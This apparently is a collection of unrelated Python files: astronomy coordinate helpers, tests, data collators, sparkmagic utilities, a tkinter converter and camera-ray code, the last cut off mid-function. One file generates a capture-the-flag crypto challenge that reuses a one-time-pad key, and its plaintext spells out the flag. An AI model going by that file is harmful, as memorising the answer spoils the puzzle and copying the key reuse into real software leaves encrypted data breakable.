IsBrowsable=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates the value of the System.ComponentModel.BrowsableAttribute on the property.
Get: IsBrowsable(self: DependencyPropertyDescriptor) -> bool
"""
IsLocalizable=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether this property should be localized,as specified in the System.ComponentModel.LocalizableAttribute.
Get: IsLocalizable(self: DependencyPropertyDescriptor) -> bool
"""
IsReadOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether this property is read-only.
Get: IsReadOnly(self: DependencyPropertyDescriptor) -> bool
"""
Metadata=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the metadata associated with the dependency property.
Get: Metadata(self: DependencyPropertyDescriptor) -> PropertyMetadata
"""
NameHashCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the hash code for the name of the member,as specified in System.String.GetHashCode.
"""
PropertyType=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the represented System.Type of the dependency property.
Get: PropertyType(self: DependencyPropertyDescriptor) -> Type
"""
SupportsChangeEvents=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Indicates whether value change notifications for this property may originate from outside the property descriptor,such as from the component itself,or whether notifications will only originate from direct calls made to System.ComponentModel.DependencyPropertyDescriptor.SetValue(System.Object,System.Object).
Get: SupportsChangeEvents(self: DependencyPropertyDescriptor) -> bool
"""
|
python
|
from pathlib import Path
import pytest
import caption_contest_data as ccd
filenames = list(ccd._api._get_response_fnames().keys())
DUELING_XFAIL = """These contests are dueling bandits, not cardinal bandits
(which have pairwise comparisons, not single caption ratings).
These aren't officially supported.
"""
def _get_file(f):
if "dueling" in str(f) or "497" in str(f):
return pytest.param(f, marks=pytest.mark.xfail(reason=DUELING_XFAIL))
return f
@pytest.fixture(params=[_get_file(f) for f in filenames])
def df(request):
filename = request.param
ccd.get_responses()
return ccd.responses(filename)
def test_responses(df):
expected = {
"contest",
"network_delay",
"response_time",
"participant_uid",
"timestamp_query_generated",
"filename",
"alg_label",
"target",
"target_id",
"target_reward",
"timestamp_query_generated",
"label",
}
assert set(df.columns) == expected
|
python
|
from pdip.cqrs.decorators import requestclass
from pdi.application.operation.CreateDataOperation.CreateDataIntegrationConnectionDatabaseRequest import \
CreateDataIntegrationConnectionDatabaseRequest
from pdi.application.operation.CreateDataOperation.CreateDataIntegrationConnectionFileRequest import \
CreateDataIntegrationConnectionFileRequest
from pdi.application.operation.CreateDataOperation.CreateDataIntegrationConnectionQueueRequest import \
CreateDataIntegrationConnectionQueueRequest
@requestclass
class CreateDataIntegrationConnectionRequest:
ConnectionName: str = None
Database: CreateDataIntegrationConnectionDatabaseRequest = None
File: CreateDataIntegrationConnectionFileRequest = None
Queue: CreateDataIntegrationConnectionQueueRequest = None
Columns: str = None
|
python
|
"""Astronomical coordinate functions."""
import re,pdb
import numpy as np
from numpy import arccos,sin,cos
from math import pi
# constants
DEG_PER_HR = 360. / 24. # degrees per hour
DEG_PER_MIN = DEG_PER_HR / 60. # degrees per min
DEG_PER_S = DEG_PER_MIN / 60. # degrees per sec
DEG_PER_AMIN = 1./60. # degrees per arcmin
DEG_PER_ASEC = DEG_PER_AMIN / 60. # degrees per arcsec
RAD_PER_DEG = pi / 180. # radians per degree
def ang_sep(ra1, dec1, ra2, dec2):
""" Returns the angular separation (in units of degrees) on the
celestial sphere between two ra/dec coordinates given in degrees.
Accepts numpy arrays.
Note: only works for separations larger than about 0.1 arcsec.
Smaller separations are always returned as zero, because of
floating point effects.
>>> np.allclose(ang_sep(2, 0, 4, 0), 2.)
True
>>> np.allclose(ang_sep(359, 0, 1, 0), 2.)
True
>>> np.allclose(ang_sep(0, 20, 0, -10), 30)
True
>>> np.allclose(ang_sep(7, 20, 8, 40), 20.018358)
True
>>> np.allclose(ang_sep(7, 20, 250, -50.3), 122.388401)
True
>>> ang_sep(-1, 10, 240, -10) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: RA outside sensible limits. -1
>>> ras = [24.5,23.6]; decs = [66.89,67.01]
>>> ref_sep = np.array([3.520032, 3.26675])
>>> np.allclose(ang_sep(20. ,70., ras, decs), ref_sep)
True
>>> ras = [24.5, 23.6]; decs = [91.89, 67.01]
>>> ang_sep(20.0, 70.0, ras, decs) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: Dec outside sensible limits. [ 91.89 67.01]
"""
ra1 = np.asarray(ra1); ra2 = np.asarray(ra2)
dec1 = np.asarray(dec1); dec2 = np.asarray(dec2)
# error checking
# for ra in ra1,ra2:
# if not ((0. <= ra)&(ra < 360.)).all():
# raise ValueError("RA outside sensible limits. %s" % ra)
# for dec in dec1,dec2:
# if np.any(np.abs(dec) > 90.):
# raise ValueError("Dec outside sensible limits. %s" % dec)
ra1 = ra1 * RAD_PER_DEG # convert to radians
ra2 = ra2 * RAD_PER_DEG
dec1 = dec1 * RAD_PER_DEG
dec2 = dec2 * RAD_PER_DEG
sra1 = sin(ra1); sra2 = sin(ra2)
cra1 = cos(ra1); cra2 = cos(ra2)
sdec1 = sin(dec1); sdec2 = sin(dec2)
cdec1 = cos(dec1); cdec2 = cos(dec2)
csep = cdec1*cdec2*(cra1*cra2 + sra1*sra2) + sdec1*sdec2
# An ugly work-around for floating point issues.
#if np.any(csep > 1): print csep
csep = np.where(csep > 1., 1., csep)
degsep = arccos(csep) / RAD_PER_DEG
# only works for separations > 0.1 of an arcsec or >~2.7e-5 dec
degsep = np.where(degsep < 1e-5, 0, degsep)
return degsep
def _dec2s(ra, dec,
raformat='%02.0f %02.0f %06.3f', decformat='%02.0f %02.0f %05.2f'):
"""
Converts decimal RA and Dec (both in degrees) to sexigesimal RA
(hours/minutes/seconds) and Dec (degrees/arcmin/arcsec). Returns
two strings, RA and Dec.
doctests:
>>> dec2s(156.1125638,-10.12986)
('10 24 27.015', '-10 07 47.50')
>>> dec2s(0.0,-90.0)
('00 00 00.000', '-90 00 00.00')
>>> dec2s(148.2,95.0)
Traceback (most recent call last):
...
ValueError: Decimal RA or Dec outside sensible limits.
>>> dec2s(360.0,-30.1)
Traceback (most recent call last):
...
ValueError: Decimal RA or Dec outside sensible limits.
"""
ra = float(ra)
dec = float(dec)
if dec < 0.:
dec *= -1.
negdec = True
else: negdec = False
# error checking
if not (0.0 <= ra < 360.) or dec > 90.:
raise ValueError("Decimal RA or Dec outside sensible limits.")
rah, temp = divmod(ra, DEG_PER_HR)
ram, temp = divmod(temp, DEG_PER_MIN)
ras = temp / DEG_PER_S
s_ra = raformat % (rah, ram, ras)
decd, temp = divmod(dec, 1)
decm, temp = divmod(temp, DEG_PER_AMIN)
decs = temp / DEG_PER_ASEC
if negdec:
s_dec = '-' + decformat % (decd, decm, decs)
else: s_dec = '+' + decformat % (decd, decm, decs)
return s_ra,s_dec
def dec2s(ra,dec):
""" Convert and ra and dec (or list of ras and decs) to decimal
degrees.
"""
try:
return _dec2s(ra, dec)
except TypeError:
pass
radec = [_dec2s(r,d) for r, d in zip(ra, dec)]
return zip(*radec)
def _s2dec(ra,dec):
""" Converts two strings of sexigesimal RA (hms) and Dec (dms) to
decimal RA and Dec (degrees). The separators between h/m/s and
deg/arcmin/arcsec can be whitespace or colons. Returns a tuple of
two floats, (ra, dec).
doctests:
>>> s2dec('00:00:00', '90:00:00')
(0.0, 90.0)
>>> temp = np.array(s2dec ('10 24 27.015', '-10 07 47.50'))
>>> reference = np.array([156.1125625,-10.129861111111111])
>>> np.all(temp - reference < 1.e-10)
True
>>> s2dec('25:11:19', '-18:4:88')
Traceback (most recent call last):
...
ValueError: Either RA or Dec is outside sensible limits.
RA = 25 11 19, Dec = -18 4 88
"""
# Convert to floats, noting sign of dec
ra = re.sub('[:hms]', ' ', ra)
dec = re.sub('[:dms]', ' ', dec)
rah,ram,ras = [float(item) for item in ra.split()]
if dec.lstrip()[0] == '-':
negdec = True
else: negdec = False
decd,decm,decs = [float(item) for item in dec.split()]
if negdec: decd *= -1.
# Error checking
if (not 0. <= rah < 24. or not 0. <= ram <= 60. or not 0. <= ras <= 60.
or decd > 90. or decm >= 60. or decs > 60):
raise ValueError('Either RA or Dec is outside sensible '
'limits.\nRA = %s, Dec = %s' % (ra,dec))
# Conversion
d_ra = DEG_PER_HR * rah + DEG_PER_MIN * ram + DEG_PER_S * ras
d_dec = decd + DEG_PER_AMIN * decm + DEG_PER_ASEC * decs
if negdec: d_dec *= -1.
return d_ra, d_dec
def s2dec(ra, dec):
""" Convert a sexigesimal ra and dec (or list of ras and decs) to
decimal degrees.
"""
try:
return _s2dec(ra, dec)
except TypeError:
pass
radec = [_s2dec(r,d) for r, d in zip(ra, dec)]
return map(np.array, zip(*radec))
def match(ra1, dec1, ra2, dec2, tol, allmatches=False):
"""
match(ra1, dec1, ra2, dec2, tol)
Given two sets of numpy arrays of ra,dec and a tolerance tol
(float), returns an array of indices and separations with the same
length as the first input array. If and index is > 0, it is the
index of the closest matching second array element within tol
arcsec. If it's -1, then there was no matching ra/dec within tol
arcsec.
if allmatches = True, then for each object in the first array,
return the index and separation of everything in the second array
within the search tolerance, not just the closest match.
Note to get the indices of objects in ra2, dec2 without a match, use
imatch = match(ra1, dec1, ra2, dec2, 2.)
inomatch = numpy.setdiff1d(np.arange(len(ra2)), set(imatch))
"""
from numpy.core.records import fromarrays
ra1,ra2,dec1,dec2 = map(np.asarray, (ra1, ra2, dec1, dec2))
abs = np.abs
isorted = ra2.argsort()
sdec2 = dec2[isorted]
sra2 = ra2[isorted]
LIM = tol * DEG_PER_ASEC
match = []
# use mean dec, assumes decs similar
decav = np.mean(sdec2.mean() + dec1.mean())
RA_LIM = LIM / cos(decav * RAD_PER_DEG)
for ra,dec in zip(ra1,dec1):
i1 = sra2.searchsorted(ra - RA_LIM)
i2 = i1 + sra2[i1:].searchsorted(ra + RA_LIM)
#print i1,i2
close = []
for j in xrange(i1,i2):
if abs(dec - sdec2[j]) > LIM:
continue
else:
# if ras and decs are within LIM arcsec, then
# calculate actual separation:
disq = ang_sep(ra, dec, sra2[j], sdec2[j])
close.append((disq, j))
close.sort()
if not allmatches:
# Choose the object with the closest separation inside the
# requested tolerance, if one was found.
if len(close) > 0:
min_dist, jmin = close[0]
if min_dist < LIM:
match.append((isorted[jmin], min_dist))
continue
# otherwise no match
match.append((-1,-1))
else:
# append all the matching objects
jclose = []
seps = []
for dist,j in close:
if dist < LIM:
jclose.append(j)
seps.append(dist)
else:
break
match.append(fromarrays([isorted[jclose], seps],
dtype=[('ind','i8'),('sep','f8')]))
if not allmatches:
# return both indices and separations in a recarray
temp = np.rec.fromrecords(match, names='ind,sep')
# change to arcseconds
temp.sep *= 3600.
temp.sep[temp.sep < 0] = -1.
return temp
else:
return match
def indmatch(ra1, dec1, ra2, dec2, tol):
"""
Finds objects in ra1, dec1 that have a matching object in ra2,dec2
within tol arcsec.
Returns i1, i2 where i1 are indices into ra1,dec1 that have
matches, and i2 are the indices into ra2, dec2 giving the matching
objects.
"""
m = match(ra1, dec1, ra2, dec2, tol)
c = m.ind > -1
i1 = c.nonzero()[0]
i2 = m.ind[c]
return i1, i2
def unique_radec(ra, dec, tol):
""" Find unique ras and decs in a list of coordinates.
RA and Dec must be array sof the same length, and in degrees.
tol is the tolerance for matching in arcsec. Any coord separated by
less that this amount are assumed to be the same.
Returns two arrays. The first is an array of indices giving the
first occurence of a unique coordinate in the input list. The
second is a list giving the indices of all coords that were
matched to a given unique coord.
The matching algorithm is confusing, but hopefully correct and not too
slow. Potential for improvement...
Example
-------
>>> ra,dec = np.loadtxt('radec.txt.gz', unpack=1)
>>> iunique, iextra = unique_radec(ra,dec,2)
>>> iknown, extraknown = np.loadtxt('radec_known.txt.gz', unpack=1)
>>> np.allclose(iunique, iknown)
>>> np.allclose(iextra, extraknown)
"""
matches = match(ra, dec, ra, dec, tol, allmatches=True)
imatchflat = []
for m in matches:
imatchflat.extend(m.ind)
#pdb.set_trace()
inomatch = np.setdiff1d(np.arange(len(ra)), list(set(imatchflat)))
assert len(inomatch) == 0
# Indices giving unique ra, decs
iunique = []
# Will be same length as iunique. Gives all indices in original
# coords that are matched to each unique coord.
iextras = []
assigned = set()
for j,m in enumerate(matches):
if not (j % 1000):
print(j)
# get the lowest index in this group
isort = sorted(m.ind)
ilow = isort[0]
if ilow not in assigned:
iunique.append(ilow)
assigned.add(ilow)
iextras.append([ilow])
# assign any extra indices to this unique coord.
for i in isort[1:]:
# check not already been assigned to another coord
if i not in assigned:
iextras[-1].append(i)
assigned.add(i)
return np.array(iunique), iextras
def parse_ra( inn ):
'''
Parse input Right Ascension string, either decimal degrees or sexagesimal HH:MM:SS.SS (or similar variants).
Returns decimal degrees.
'''
# if simple float, assume decimal degrees
try:
ra = float(inn)
return ra
except:
# try to parse with phmsdms:
res = parse_sexagesimal(inn)
ra = 15.*( res['vals'][0] + res['vals'][1]/60. + res['vals'][2]/3600. )
return ra
def parse_dec( inn ):
'''
Parse input Declination string, either decimal degrees or sexagesimal DD:MM:SS.SS (or similar variants).
Returns decimal degrees.
'''
# if simple float, assume decimal degrees
try:
dec = float(inn)
return dec
except:
# try to parse with phmsdms:
res = parse_sexagesimal(inn)
dec = res['sign']*( res['vals'][0] + res['vals'][1]/60. + res['vals'][2]/3600. )
return dec
def parse_sexagesimal(hmsdms):
"""
+++ Pulled from python package 'angles' +++
Parse a string containing a sexagesimal number.
This can handle several types of delimiters and will process
reasonably valid strings. See examples.
Parameters
----------
hmsdms : str
String containing a sexagesimal number.
Returns
-------
d : dict
parts : a 3 element list of floats
The three parts of the sexagesimal number that were
identified.
vals : 3 element list of floats
The numerical values of the three parts of the sexagesimal
number.
sign : int
Sign of the sexagesimal number; 1 for positive and -1 for
negative.
units : {"degrees", "hours"}
The units of the sexagesimal number. This is infered from
the characters present in the string. If it a pure number
then units is "degrees".
"""
units = None
sign = None
# Floating point regex:
# http://www.regular-expressions.info/floatingpoint.html
#
# pattern1: find a decimal number (int or float) and any
# characters following it upto the next decimal number. [^0-9\-+]*
# => keep gathering elements until we get to a digit, a - or a
# +. These three indicates the possible start of the next number.
pattern1 = re.compile(r"([-+]?[0-9]*\.?[0-9]+[^0-9\-+]*)")
# pattern2: find decimal number (int or float) in string.
pattern2 = re.compile(r"([-+]?[0-9]*\.?[0-9]+)")
hmsdms = hmsdms.lower()
hdlist = pattern1.findall(hmsdms)
parts = [None, None, None]
def _fill_right_not_none():
# Find the pos. where parts is not None. Next value must
# be inserted to the right of this. If this is 2 then we have
# already filled seconds part, raise exception. If this is 1
# then fill 2. If this is 0 fill 1. If none of these then fill
# 0.
rp = reversed(parts)
for i, j in enumerate(rp):
if j is not None:
break
if i == 0:
# Seconds part already filled.
raise ValueError("Invalid string.")
elif i == 1:
parts[2] = v
elif i == 2:
# Either parts[0] is None so fill it, or it is filled
# and hence fill parts[1].
if parts[0] is None:
parts[0] = v
else:
parts[1] = v
for valun in hdlist:
try:
# See if this is pure number.
v = float(valun)
# Sexagesimal part cannot be determined. So guess it by
# seeing which all parts have already been identified.
_fill_right_not_none()
except ValueError:
# Not a pure number. Infer sexagesimal part from the
# suffix.
if "hh" in valun or "h" in valun:
m = pattern2.search(valun)
parts[0] = float(valun[m.start():m.end()])
units = "hours"
if "dd" in valun or "d" in valun:
m = pattern2.search(valun)
parts[0] = float(valun[m.start():m.end()])
units = "degrees"
if "mm" in valun or "m" in valun:
m = pattern2.search(valun)
parts[1] = float(valun[m.start():m.end()])
if "ss" in valun or "s" in valun:
m = pattern2.search(valun)
parts[2] = float(valun[m.start():m.end()])
if "'" in valun:
m = pattern2.search(valun)
parts[1] = float(valun[m.start():m.end()])
if '"' in valun:
m = pattern2.search(valun)
parts[2] = float(valun[m.start():m.end()])
if ":" in valun:
# Sexagesimal part cannot be determined. So guess it by
# seeing which all parts have already been identified.
v = valun.replace(":", "")
v = float(v)
_fill_right_not_none()
if not units:
units = "degrees"
# Find sign. Only the first identified part can have a -ve sign.
for i in parts:
if i and i < 0.0:
if sign is None:
sign = -1
else:
raise ValueError("Only one number can be negative.")
if sign is None: # None of these are negative.
sign = 1
vals = [abs(i) if i is not None else 0.0 for i in parts]
return dict(sign=sign, units=units, vals=vals, parts=parts)
|
python
|
import os
from functools import reduce
def xor(a,b):
c=bytearray()
for i,j in zip(a,b):
c.append(i^j)
return c
msg1="did you expect another rsa? sorry"
msg2=" to disappoint you. What you see is a bad use "
msg3="of the otp in encryption. It literally says one"
msg4=" and not multi time. masrt{think_out_of_the_box_yeager}"
msg5="well done solving me, but are you done?"
msg6="This attack is called a crib drag or known-plaintext attack"
messages=[msg1,msg2,msg3,msg4,msg5,msg6]
L=reduce(max,[len(i) for i in messages] )
key=os.urandom(L)
open("key.txt","a").write(key.hex()+"\n")
with open("message.txt","w") as f:
for msg in messages:
f.write(xor(msg.encode(),key).hex()+"\n")
f.close()
|
python
|
import torch
from common.utils.clip_pad import *
import numpy as np
class BatchCollator(object):
def __init__(self, dataset, append_ind=False):
self.dataset = dataset
self.test_mode = self.dataset.test_mode
self.data_names = self.dataset.data_names
self.append_ind = append_ind
def __call__(self, batch):
if not isinstance(batch, list):
batch = list(batch)
if batch[0][self.data_names.index('image')] is not None:
max_shape = tuple(max(s) for s in zip(*[data[self.data_names.index('image')].shape for data in batch]))
image_none = False
else:
image_none = True
max_boxes = max([data[self.data_names.index('boxes')].shape[0] for data in batch])
max_question_length = max([len(data[self.data_names.index('question')]) for data in batch])
for i, ibatch in enumerate(batch):
out = {}
if image_none:
out['image'] = None
out['image1'] = None
else:
image = ibatch[self.data_names.index('image')]
image1 = ibatch[self.data_names.index('image1')]
out['image'] = clip_pad_images(image, max_shape, pad=0)
out['image1'] = clip_pad_images(image1, max_shape, pad=0)
boxes = ibatch[self.data_names.index('boxes')]
out['boxes'] = clip_pad_boxes(boxes, max_boxes, pad=-2)
question = ibatch[self.data_names.index('question')]
out['question'] = clip_pad_1d(question, max_question_length, pad=0)
array = [0 for i in range(15)]
if ibatch[self.data_names.index('index')] % 7 == 0:
array[7] = 1
out['index'] = torch.tensor(array)
other_names = [data_name for data_name in self.data_names if data_name not in out]
for name in other_names:
if name == 'boxes1':
boxes1 = ibatch[self.data_names.index('boxes1')]
out['boxes1'] = clip_pad_boxes(boxes1, max_boxes, pad=-2)
elif name == 'question1':
question1 = ibatch[self.data_names.index('question1')]
out['question1'] = clip_pad_1d(question1, max_question_length, pad=0)
else:
out[name] = torch.as_tensor(ibatch[self.data_names.index(name)])
batch[i] = tuple(out[data_name] for data_name in self.data_names)
if self.append_ind:
batch[i] += (torch.tensor(i, dtype=torch.int64),)
out_tuple = ()
for items in zip(*batch):
if items[0] is None or items[3] is None:
out_tuple += (None,)
else:
out_tuple += (torch.stack(tuple(items), dim=0), )
return out_tuple
|
python
|
from .leaderboards import *
#from .nominationAssessmentTeam import *
from .players import *
#from .publicRanking import *
#from .qualityAssuranceTeam import *
#from .rankingTeam import *
#from .websiteUser import *
|
python
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper functions for commonly used utilities."""
from sparkmagic.livyclientlib.endpoint import Endpoint
from sparkmagic.livyclientlib.exceptions import BadUserConfigurationException
from sparkmagic.utils.utils import initialize_auth, Namespace
class SerializableEndpoint():
""" A class that serializes an endpoint object for storing and restoring endpoints"""
def __init__(self, endpoint):
self.cluster = endpoint.auth.cluster_widget.v_model
self.url = endpoint.url
self.project = endpoint.auth.project_widget.v_model
self.region = endpoint.auth.region_widget.v_model
self.account = endpoint.auth.active_credentials
def get_stored_endpoints(db, ipython_display):
"""Gets a list of endpoints that were added in previous notebook sessions
Args:
db (dict): the ipython database where stored_endpoints list will be stored
ipython_display (hdijupyterutils.ipythondisplay.IpythonDisplay): the display that
informs the user of any errors that occur while restoring endpoints
Returns:
stored_endpoints (Sequence[dict]): A list of dicts, each dict storing an
Endpoint's writeable attributes. If no endpoints can be obtained from previous
notebook sessions, an empty list is returned.
"""
try:
stored_endpoints = db['autorestore/' + 'stored_endpoints']
return stored_endpoints
except KeyError:
db['autorestore/' + 'stored_endpoints'] = list()
return list()
except Exception as caught_exc:
db['autorestore/' + 'stored_endpoints'] = list()
ipython_display.writeln("Failed to restore stored_endpoints from a previous notebook "\
f"session due to an error: {str(caught_exc)}. Cleared stored_endpoints.")
return list()
def get_session_id_to_name(db, ipython_display):
"""Gets a dictionary that maps currently running livy session id's to their names
Args:
db (dict): the ipython database where sessions dict will be stored
ipython_display (hdijupyterutils.ipythondisplay.IpythonDisplay): the display that
informs the user of any errors that occur while restoring sessions
Returns:
session_id_to_name (dict): a dictionary mapping session.id -> name
If no sessions can be obtained from previous notebook sessions, an
empty dict is returned.
"""
try:
session_id_to_name = db['autorestore/' + 'session_id_to_name']
return session_id_to_name
except KeyError:
db['autorestore/' + 'session_id_to_name'] = dict()
return dict()
except Exception as caught_exc:
ipython_display.writeln("Failed to restore session_id_to_name from a previous notebook "\
f"session due to an error: {str(caught_exc)}. Cleared session_id_to_name.")
return dict()
def _restore_endpoints_and_sessions(db, ipython_display, spark_controller, endpoints):
"""Loads all of the running livy sessions of an endpoint
Args:
db (dict): the ipython database where stored_endpoints list will be stored
ipython_display (hdijupyterutils.ipythondisplay.IpythonDisplay): the display that
informs the user of any errors that occur while restoring endpoints
spark_controller (sparkmagic.livyclientlib.sparkcontroller.SparkController): an object that
manages all the spark sessions
endpoints (dict): the endpoints dict that restored endpoints will be added to.
"""
stored_endpoints = get_stored_endpoints(db, ipython_display)
try:
for serialized_endpoint in stored_endpoints:
args = Namespace(auth='Google', url=serialized_endpoint.get('url'), \
account=serialized_endpoint.get('account'))
auth = initialize_auth(args)
endpoint = Endpoint(url=serialized_endpoint.get('url'), auth=auth)
endpoints[endpoint.url] = endpoint
# If a user revokes the credentials used for stored endpoints and sessions,
# all of the stored endpoints and sessions are cleared.
except BadUserConfigurationException as caught_exc:
db['autorestore/' + 'stored_endpoints'] = list()
db['autorestore/' + 'session_id_to_name'] = dict()
ipython_display.send_error("Failed to restore endpoints and sessions "\
f"due to an authentication error: {str(caught_exc)}. "\
"Cleared stored_endpoints and session_id_to_name.")
for endpoint in endpoints.values():
session_id_to_name = get_session_id_to_name(db, ipython_display)
#get all sessions running on that endpoint
endpoint_sessions = spark_controller.get_all_sessions_endpoint(endpoint)
#add each session to session manager.
for session in endpoint_sessions:
name = session_id_to_name.get(session.id)
if name is not None and name not in spark_controller.get_managed_clients():
spark_controller.session_manager.add_session(name, session)
|
python
|
# celcius to fahrenheit
import tkinter
class FahrenheiterGUI(): # :D
def __init__(self):
# create the main window
self.main_window = tkinter.Tk()
# set the title
self.main_window.title("Celcius to Fahrenheit")
# create three frames for this GUI
self.top_frame = tkinter.Frame(self.main_window)
self.mid_frame = tkinter.Frame(self.main_window)
self.bottom_frame = tkinter.Frame(self.main_window)
# create widgets for the top frame
self.prompt_label = tkinter.Label(self.top_frame,
text="Enter the Celcius temperature: ")
self.entry_celcius = tkinter.Entry(self.top_frame,
width=10)
# pack them
self.prompt_label.pack(side="left")
self.entry_celcius.pack(side="left")
# MID FRAME
self.display_message = tkinter.Label(self.mid_frame,
text="In Fahrenheit it equals to:")
# create a StringVar to hold the converted value
self.fahrenheit = tkinter.StringVar()
# create a label to show this converted value.
self.show_fahrenheit = tkinter.Label(self.mid_frame,
textvariable=self.fahrenheit)
# pack them
self.display_message.pack(side="left")
self.show_fahrenheit.pack(side="left")
# BOTTOM FRAME
# button for calculate MPG
self.calc_button = tkinter.Button(self.bottom_frame,
text="Convert to Fahrenheit",
command=self.convert)
self.quit_button = tkinter.Button(self.bottom_frame,
text="Quit",
bg="red",
command=self.main_window.destroy)
# pack them
self.calc_button.pack(side="left")
self.quit_button.pack(side="left")
# pack the frames.
self.top_frame.pack()
self.mid_frame.pack()
self.bottom_frame.pack()
# enter into mainloop
self.main_window.mainloop()
def convert(self):
# convert the given value
# remember .get method returns "String" convert it into int or float
# for mathematical expressions.
self.calculated_fahrenheit = (
(9 / 5) * float(self.entry_celcius.get()) + 32)
# return fahrenheit back into StringVar object using .set() method
self.fahrenheit.set(format(self.calculated_fahrenheit, ",.2f"))
# create an instance of Fahrenheiter
example = FahrenheiterGUI()
|
python
|
#!/usr/local/bin/python
# Physics Equation Graph
# Ben Payne <[email protected]>
import sys
import os
lib_path = os.path.abspath('lib')
sys.path.append(lib_path) # this has to proceed use of physgraph
db_path = os.path.abspath('databases')
sys.path.append(lib_path) # this has to proceed use of physgraph
import lib_physics_graph as physgraf
from xml.dom.minidom import parseString
#all these imports are standard on most modern python implementations
#open the xml file for reading:
file = open(db_path+'/statements_database.xml','r')
#convert to string:
data = file.read()
#close file because we dont need it anymore:
file.close()
#parse the xml you got from the file
dom = parseString(data)
#retrieve the first xml tag (<tag>data</tag>) that the parser finds with name tagName:
xmlTag = dom.getElementsByTagName('statement')[0].toxml()
#strip off the tag (<tag>data</tag> ---> data):
xmlData=xmlTag.replace('<statement>','').replace('</statement>','')
print "\nprint out the xml tag and data in this format: <tag>data</tag>"
print xmlTag
print "\njust print the data"
print xmlData
|
python
|
import numpy as np
import torch
from colorsys import hsv_to_rgb
def get_camera_rays(c_pos, width=320, height=240, focal_length=0.035, sensor_width=0.032, noisy=False,
vertical=None, c_track_point=None):
#c_pos = np.array((0., 0., 0.))
# The camera is pointed at the origin
if c_track_point is None:
c_track_point = np.array((0., 0., 0.))
if vertical is None:
vertical = np.array((0., 0., 1.))
c_dir = (c_track_point - c_pos)
c_dir = c_dir / np.linalg.norm(c_dir)
img_plane_center = c_pos + c_dir * focal_length
# The horizontal axis of the camera sensor is horizontal (z=0) and orthogonal to the view axis
img_plane_horizontal = np.cross(c_dir, vertical)
#img_plane_horizontal = np.array((-c_dir[1]/c_dir[0], 1., 0.))
img_plane_horizontal = img_plane_horizontal / np.linalg.norm(img_plane_horizontal)
# The vertical axis is orthogonal to both the view axis and the horizontal axis
img_plane_vertical = np.cross(c_dir, img_plane_horizontal)
img_plane_vertical = img_plane_vertical / np.linalg.norm(img_plane_vertical)
# Double check that everything is orthogonal
def is_small(x, atol=1e-7):
return abs(x) < atol
assert(is_small(np.dot(img_plane_vertical, img_plane_horizontal)))
assert(is_small(np.dot(img_plane_vertical, c_dir)))
assert(is_small(np.dot(c_dir, img_plane_horizontal)))
# Sensor height is implied by sensor width and aspect ratio
sensor_height = (sensor_width / width) * height
# Compute pixel boundaries
horizontal_offsets = np.linspace(-1, 1, width+1) * sensor_width / 2
vertical_offsets = np.linspace(-1, 1, height+1) * sensor_height / 2
# Compute pixel centers
horizontal_offsets = (horizontal_offsets[:-1] + horizontal_offsets[1:]) / 2
vertical_offsets = (vertical_offsets[:-1] + vertical_offsets[1:]) / 2
horizontal_offsets = np.repeat(np.reshape(horizontal_offsets, (1, width)), height, 0)
vertical_offsets = np.repeat(np.reshape(vertical_offsets, (height, 1)), width, 1)
if noisy:
pixel_width = sensor_width / width
pixel_height = sensor_height / height
horizontal_offsets += (np.random.random((height, width)) - 0.5) * pixel_width
vertical_offsets += (np.random.random((height, width)) - 0.5) * pixel_height
horizontal_offsets = (np.reshape(horizontal_offsets, (height, width, 1)) *
np.reshape(img_plane_horizontal, (1, 1, 3)))
vertical_offsets = (np.reshape(vertical_offsets, (height, width, 1)) *
np.reshape(img_plane_vertical, (1, 1, 3)))
image_plane = horizontal_offsets + vertical_offsets
image_plane = image_plane + np.reshape(img_plane_center, (1, 1, 3))
c_pos_exp = np.reshape(c_pos, (1, 1, 3))
rays = image_plane - c_pos_exp
ray_norms = np.linalg.norm(rays, axis=2, keepdims=True)
rays = rays / ray_norms
return rays.astype(np.float32)
def depths_to_world_coords(depths, rays, camera_pos, depth_noise=None, noise_ratio=1.):
#height, width = depths.shape
#sensor_width = (0.032 / 320) * width
#rays = get_camera_rays(camera_pos)
# TODO: Put this code in a place that makes sense
if depth_noise is not None:
noise_indicator = (np.random.random(depths.shape) <= noise_ratio).astype(np.float32)
depths = depths + noise_indicator * np.random.random(depths.shape) * depth_noise
#rays = prep_fn(rays)
surface_points = camera_pos + rays * np.expand_dims(depths, -1)
return surface_points.astype(np.float32)
def importance_sample_empty_points(surface_points, depths, camera_pos, cutoff=0.98, p_near=0.5):
num_points = surface_points.shape[0]
rays = surface_points - camera_pos
random_intercepts = np.random.random((num_points, 1)).astype(np.float32)
near_indicator = np.random.binomial(1, p_near, size=(num_points, 1))
range_bottom = near_indicator * cutoff
range_top = cutoff + (near_indicator * (1. - cutoff))
random_intercepts = range_bottom + (range_top - range_bottom) * random_intercepts
noise_points = camera_pos + (random_intercepts * rays)
weights = (cutoff * depths * (1 - near_indicator[..., 0]) * 2 +
(1 - cutoff) * depths * near_indicator[..., 0] * 2)
return noise_points.astype(np.float32), weights.astype(np.float32)
def zs_to_depths(zs, rays, camera_pos):
view_axis = -camera_pos
view_axis = view_axis / np.linalg.norm(view_axis, axis=-1, keepdims=True)
factors = np.einsum('...i,i->...', rays, view_axis)
depths = zs / factors
return depths
def frustum_cull(points, camera_pos, rays, near_plane=None, far_plane=None):
corners = [rays[0, 0], rays[0, -1], rays[-1, -1], rays[-1, 0]]
rel_points = points - np.expand_dims(camera_pos, 0)
included = np.ones(points.shape[0])
for i in range(4):
c1 = corners[i]
c2 = corners[(i+1) % 4]
normal = np.cross(c1, c2)
normal /= np.linalg.norm(normal)
